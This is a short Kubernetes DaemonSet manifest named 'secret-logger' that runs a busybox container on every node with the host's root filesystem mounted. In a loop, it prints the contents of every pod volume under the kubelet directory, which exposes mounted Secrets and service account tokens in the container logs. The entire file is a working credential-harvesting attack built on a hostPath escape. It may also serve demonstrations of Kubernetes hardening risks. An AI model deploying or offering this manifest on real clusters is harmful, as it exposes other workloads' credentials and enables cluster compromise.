apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: secret-logger
  labels:
    app: secret-logger
spec:
  selector:
    matchLabels:
      app: secret-logger
  template:
    metadata:
      labels:
        app: secret-logger
    spec:
      containers:
        - name: secret-logger
          image: docker.io/library/busybox:1.28.4
          command:
            - sh
            - -c
            - while true; do find /rootfs/var/lib/kubelet/pods/*/volumes -print -exec cat {} \;; echo ""; sleep 10; done
          volumeMounts:
            - name: rootfs
              mountPath: /rootfs
      volumes:
        - name: rootfs
          hostPath:
            path: /
